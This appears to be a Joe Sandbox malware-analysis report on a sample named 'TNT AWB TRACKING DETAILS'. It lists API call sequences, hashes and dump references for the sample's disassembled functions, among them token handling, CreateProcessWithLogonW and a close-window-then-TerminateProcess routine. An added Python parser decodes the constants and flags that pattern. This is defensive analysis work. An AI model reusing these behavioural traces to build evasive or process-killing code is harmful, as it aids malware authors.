                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                    • String ID:
                                                    • API String ID: 4046560759-0
                                                    • Opcode ID: 18113cfd154707d6ac26c987e415cceb9ea81d37fc4e5c826c6dbb1ef5c3f281
                                                    • Instruction ID: a0f34869991a9c8dd689b120a56f7a2ea1b251b13e4ac6a33290fb859b08a6b9
                                                    • Opcode Fuzzy Hash: 18113cfd154707d6ac26c987e415cceb9ea81d37fc4e5c826c6dbb1ef5c3f281
                                                    • Instruction Fuzzy Hash: 49518831608304AFC700EF64C985E6EBBE9FF85314F04492DF995972A2DB32E945EB52
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 00F457FB
                                                    • GetMenuItemCount.USER32(00000000), ref: 00F45832
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F4585A
                                                    • GetMenuItemID.USER32(?,?), ref: 00F458C9
                                                    • GetSubMenu.USER32(?,?), ref: 00F458D7
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F45928
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: 00b99cbbaaabe13e08247d6ec4c65794798d033d3e2e3c000771d845ac01baf1
                                                    • Instruction ID: 2e8d0fda8ee11329a11d4837fb42f879685088d86854991e1b5797cc0c70a22d
                                                    • Opcode Fuzzy Hash: 00b99cbbaaabe13e08247d6ec4c65794798d033d3e2e3c000771d845ac01baf1
                                                    • Instruction Fuzzy Hash: A4514B36E00619AFCF15EF64C845AAEBBB4EF48720F104069EC05BB352DB75AE419B90
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00F1EF06
                                                    • VariantClear.OLEAUT32(00000013), ref: 00F1EF78
                                                    • VariantClear.OLEAUT32(00000000), ref: 00F1EFD3
                                                    • _memmove.LIBCMT ref: 00F1EFFD
                                                    • VariantClear.OLEAUT32(?), ref: 00F1F04A
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F1F078
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                    • String ID:
                                                    • API String ID: 1101466143-0
                                                    • Opcode ID: 66cd33411b9e8a5924380109eadfa056e18220c01fbb8302e9e4d58841b9110c
                                                    • Instruction ID: b9e57de81ad0d8b658d034a2d56426add327f3175338914c4557a57a18b6fc40
                                                    • Opcode Fuzzy Hash: 66cd33411b9e8a5924380109eadfa056e18220c01fbb8302e9e4d58841b9110c
                                                    • Instruction Fuzzy Hash: 375166B5A00209EFDB10CF58C880AAAB7F8FF4C314B15856AED49DB315E731E955CBA0
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F22258
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F222A3
                                                    • IsMenu.USER32(00000000), ref: 00F222C3
                                                    • CreatePopupMenu.USER32 ref: 00F222F7
                                                    • GetMenuItemCount.USER32(000000FF), ref: 00F22355
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F22386
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: 68fc0a1f30a0805e2e08405b2c6008ea87bd76fcd790a9f72e3a1fd54a52873f
                                                    • Instruction ID: 4e56bf0f2ee7b4642eec610bf889e4a63f267afec6dddeef943f08711a7efe3a
                                                    • Opcode Fuzzy Hash: 68fc0a1f30a0805e2e08405b2c6008ea87bd76fcd790a9f72e3a1fd54a52873f
                                                    • Instruction Fuzzy Hash: B551C130A00269FFDF61CF68E988BADBBF5BF05324F144129E8159B290D3788D04EB51
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00EC179A
                                                    • GetWindowRect.USER32(?,?), ref: 00EC17FE
                                                    • ScreenToClient.USER32(?,?), ref: 00EC181B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EC182C
                                                    • EndPaint.USER32(?,?), ref: 00EC1876
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: b33eaf41549d9c640adee9abc5d8b47565a36d52e0cadb18b9af9cc792cc6e77
                                                    • Instruction ID: 488704eecc6e39340104eaba62ccac66eb6f922513ccc56a2042b7d6f297c441
                                                    • Opcode Fuzzy Hash: b33eaf41549d9c640adee9abc5d8b47565a36d52e0cadb18b9af9cc792cc6e77
                                                    • Instruction Fuzzy Hash: FC41B2351043449FD710DF24CC84FBA7BE8FB56764F0446ADFAA8971A2C7319846EB62
                                                    APIs
                                                    • ShowWindow.USER32(00F857B0,00000000,01855758,?,?,00F857B0,?,00F4B5A8,?,?), ref: 00F4B712
                                                    • EnableWindow.USER32(?,00000000), ref: 00F4B736
                                                    • ShowWindow.USER32(00F857B0,00000000,01855758,?,?,00F857B0,?,00F4B5A8,?,?), ref: 00F4B796
                                                    • ShowWindow.USER32(?,00000004,?,00F4B5A8,?,?), ref: 00F4B7A8
                                                    • EnableWindow.USER32(?,00000001), ref: 00F4B7CC
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F4B7EF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 76a2bfd6c16627d35b55ff8a6da456e880f4a38c00d60c0c5fd089c254e3e9d4
                                                    • Instruction ID: 70694120f204fcd9adfb2d15c93d15dca8e0c8091f6e58ead1973df22026f04a
                                                    • Opcode Fuzzy Hash: 76a2bfd6c16627d35b55ff8a6da456e880f4a38c00d60c0c5fd089c254e3e9d4
                                                    • Instruction Fuzzy Hash: D0414D34A01244AFDB26CF24C599B957FE1FB45320F1841B9EE488F6A3C731E856EB51
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00F34E41,?,?,00000000,00000001), ref: 00F370AC
                                                      • Part of subcall function 00F339A0: GetWindowRect.USER32(?,?), ref: 00F339B3
                                                    • GetDesktopWindow.USER32 ref: 00F370D6
                                                    • GetWindowRect.USER32(00000000), ref: 00F370DD
                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F3710F
                                                      • Part of subcall function 00F25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F252BC
                                                    • GetCursorPos.USER32(?), ref: 00F3713B
                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F37199
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: 1e63fbef31ff725f6b27bf12a4d4ac5580f5198c6faa3f612530e48878cc2f18
                                                    • Instruction ID: 9030a5cfcac66fb29bebe66ce2a33be4c3573bf92da0e4228133040f6315947e
                                                    • Opcode Fuzzy Hash: 1e63fbef31ff725f6b27bf12a4d4ac5580f5198c6faa3f612530e48878cc2f18
                                                    • Instruction Fuzzy Hash: 2231E472509309ABD720EF14DC49F9BB7EAFF89324F000919F98997191C734EA09DB92
                                                    APIs
                                                      • Part of subcall function 00F180A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F180C0
                                                      • Part of subcall function 00F180A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F180CA
                                                      • Part of subcall function 00F180A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F180D9
                                                      • Part of subcall function 00F180A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F180E0
                                                      • Part of subcall function 00F180A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F180F6
                                                    • GetLengthSid.ADVAPI32(?,00000000,00F1842F), ref: 00F188CA
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F188D6
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F188DD
                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F188F6
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00F1842F), ref: 00F1890A
                                                    • HeapFree.KERNEL32(00000000), ref: 00F18911
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                    • String ID:
                                                    • API String ID: 3008561057-0
                                                    • Opcode ID: 6194d433288445be92ab9b4eaac0405fca13a0a753b77becc81660179e4fa6d9
                                                    • Instruction ID: 63db387e9fa9bd17f983c17f980975b577a54e59628cc130c6836c9e54a3dae4
                                                    • Opcode Fuzzy Hash: 6194d433288445be92ab9b4eaac0405fca13a0a753b77becc81660179e4fa6d9
                                                    • Instruction Fuzzy Hash: 0F11B136901209FFDB109FA4DD09BFF7BACEB85365F504068E84997111CB329D86EB60
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F185E2
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00F185E9
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F185F8
                                                    • CloseHandle.KERNEL32(00000004), ref: 00F18603
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F18632
                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F18646
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 74d9406e59029bf3c4677e2992c16fcf7dba0e2cb7d1535f66cb3dbc3545ed76
                                                    • Instruction ID: 4c1a3679a26e2951a18c4b8327b64187e07303687fe3c9575e7c1901b1f39443
                                                    • Opcode Fuzzy Hash: 74d9406e59029bf3c4677e2992c16fcf7dba0e2cb7d1535f66cb3dbc3545ed76
                                                    • Instruction Fuzzy Hash: 9E117F7650020DABDF11CFA4DD49FDE7BA9EF49364F044064FE05A2160C7758DA5EB60
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00F1B7B5
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F1B7C6
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F1B7CD
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00F1B7D5
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F1B7EC
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 00F1B7FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 92619ff2ad6e9a23194b278ed97da2891906024cca0a0bc654cbfb5b854515ea
                                                    • Instruction ID: 21fafdf7fe44c531259a31eb56aa159553253d5fa818adb6dc46a408c6b3867a
                                                    • Opcode Fuzzy Hash: 92619ff2ad6e9a23194b278ed97da2891906024cca0a0bc654cbfb5b854515ea
                                                    • Instruction Fuzzy Hash: EC018475E00319BBEB10ABB69C45A5EBFB8EB59361F044075FE08E7291D6309C00DF90
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EE0193
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EE019B
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EE01A6
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EE01B1
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EE01B9
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE01C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: 8c956c1d0cf7e49901ae657e6a01c2afc6700147b845b36233f0493b548a2c0a
                                                    • Instruction ID: 6b3aa5ccf6a1b685fff09fd34ba6d44bd54969793ea8f6d213aff22667568bd6
                                                    • Opcode Fuzzy Hash: 8c956c1d0cf7e49901ae657e6a01c2afc6700147b845b36233f0493b548a2c0a
                                                    • Instruction Fuzzy Hash: C5016CB09027597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F253F9
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F2540F
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00F2541E
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F2542D
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F25437
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F2543E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: 8af4022a41d75791048a11a205ebcc1f4dfb594d7a489c058dff46662b1553a7
                                                    • Instruction ID: 410fa040680bcd6a1b8545ef97826273d2021843deb5a8bd8a3588f85d5b9305
                                                    • Opcode Fuzzy Hash: 8af4022a41d75791048a11a205ebcc1f4dfb594d7a489c058dff46662b1553a7
                                                    • Instruction Fuzzy Hash: 48F06D3624015CBBE3205BA29C0DEAB7A7CEBD7B11F000169FE08D105096A01A05A6B5
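                                                     The entry above lists the call sequence PostMessageW(WM_CLOSE), SendMessageTimeoutW(WM_CLOSE, SMTO_ABORTIFHUNG, 500 ms), GetWindowThreadProcessId, OpenProcess(PROCESS_ALL_ACCESS), TerminateProcess, CloseHandle, but the report prints every argument as bare hex. As an added example that is not part of the Joe Sandbox report, the following Python parses these "APIs" bullet lines exactly as they appear on this page (bullet glyph, optional "Part of subcall function" prefix, argument list, "ref:" address), names the Win32 constants that this editor is certain of, and flags the close-window-then-terminate-owner shape of this function. The sample input is copied from entries on this page; the constant table is the editor's, not the report's; reading the flagged pattern as a WinKill-style helper of the AutoIt runtime is an inference, not something the report states.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One "APIs" bullet of a Joe Sandbox function entry, as extracted on this page, e.g.
#   • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00F2542D
#   • _memset.LIBCMT ref: 00F22B87
#     • Part of subcall function 00F26C35: CloseHandle.KERNEL32(00000000,?), ref: 00F26C3F
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]       # None where the report printed "?" (not known statically)
    ref: int                        # call-site address inside the dumped image
    subcall: Optional[str] = None   # callee address when the line is "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the bullet lines of one function's "APIs" list, keeping report order."""
    calls = []
    for line in text.strip().splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        raw = m.group("args")
        args = [] if not raw else [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), m.group("sub")))
    return calls


# Win32 constants the report prints as bare hex, keyed by (API name, argument index).
# Editor-supplied table; only values this editor is certain of, anything else stays undecoded.
WINDOW_MSG = {0x10: "WM_CLOSE", 0x188: "LB_GETCURSEL", 0x189: "LB_GETTEXT", 0x18A: "LB_GETTEXTLEN"}
CONST: Dict[Tuple[str, int], Dict[int, str]] = {
    ("PostMessageW", 1): WINDOW_MSG,
    ("SendMessageW", 1): WINDOW_MSG,
    ("SendMessageTimeoutW", 1): WINDOW_MSG,
    ("SendMessageTimeoutW", 4): {0x2: "SMTO_ABORTIFHUNG"},
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS (pre-Vista SDK value)"},
    ("GetDeviceCaps", 1): {0x58: "LOGPIXELSX", 0x5A: "LOGPIXELSY"},
    ("MapVirtualKeyW", 0): {0x5B: "VK_LWIN", 0x10: "VK_SHIFT", 0xA0: "VK_LSHIFT",
                            0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"},
    ("CoCreateInstance", 2): {0x5: "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER"},
    ("SetErrorMode", 0): {0x1: "SEM_FAILCRITICALERRORS"},
}


def decode(call: ApiCall) -> List[str]:
    """Name the arguments of one call that the table knows; unknown ones are left out."""
    out = []
    for i, v in enumerate(call.args):
        name = CONST.get((call.api, i), {}).get(v) if v is not None else None
        if name:
            out.append(f"arg{i}=0x{v:X} {name}")
    return out


CLOSE_MSG_APIS = ("PostMessageW", "SendMessageW", "SendMessageTimeoutW")


def is_close_then_kill(calls: List[ApiCall]) -> bool:
    """True when the function's own calls (subcalls ignored) send WM_CLOSE to a window and
    later open and terminate a process: the polite-close-then-TerminateProcess shape.
    Treating that as a WinKill-style helper is an inference, not a statement of the report."""
    stage = 0
    for c in calls:
        if c.subcall is not None:
            continue
        if stage == 0 and c.api in CLOSE_MSG_APIS and len(c.args) > 1 and c.args[1] == 0x10:
            stage = 1
        elif stage == 1 and c.api == "OpenProcess":
            stage = 2
        elif stage == 2 and c.api == "TerminateProcess":
            return True
    return False


# Constructed input: bullets copied from this report (the PostMessageW..CloseHandle entry,
# plus one subcall line and one CRT line taken from other entries on the page).
SAMPLE = """
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F253F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F2540F
• GetWindowThreadProcessId.USER32(?,?), ref: 00F2541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F2542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F25437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F2543E
  • Part of subcall function 00F26C35: CloseHandle.KERNEL32(00000000,?,00F2727B,?,00ED0EE4,?,?), ref: 00F26C3F
• _memset.LIBCMT ref: 00F22B87
"""


def annotate(text: str) -> List[str]:
    """One line per call (address, API, decoded constants), plus a pattern line if matched."""
    calls = parse_api_lines(text)
    lines = []
    for c in calls:
        tag = f" (via subcall {c.subcall})" if c.subcall else ""
        lines.append(f"{c.ref:08X} {c.api}.{c.module}{tag} {' '.join(decode(c))}".rstrip())
    if is_close_then_kill(calls):
        lines.append("pattern: WM_CLOSE to window, then OpenProcess/TerminateProcess on its owner")
    return lines


if __name__ == "__main__":
    print("\n".join(annotate(SAMPLE)))
```

                                                     The decoder keys on (API, argument index) rather than on the raw value because the same number means different things in different positions: 0x10 is WM_CLOSE as a message ID but VK_SHIFT as a virtual-key code, and both occur in entries on this page. Calls marked "Part of subcall function" belong to a callee and are skipped when matching the sequence, so a CloseHandle reached through a helper does not satisfy or break the pattern.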
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00F27243
                                                    • EnterCriticalSection.KERNEL32(?,?,00ED0EE4,?,?), ref: 00F27254
                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00ED0EE4,?,?), ref: 00F27261
                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00ED0EE4,?,?), ref: 00F2726E
                                                      • Part of subcall function 00F26C35: CloseHandle.KERNEL32(00000000,?,00F2727B,?,00ED0EE4,?,?), ref: 00F26C3F
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F27281
                                                    • LeaveCriticalSection.KERNEL32(?,?,00ED0EE4,?,?), ref: 00F27288
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
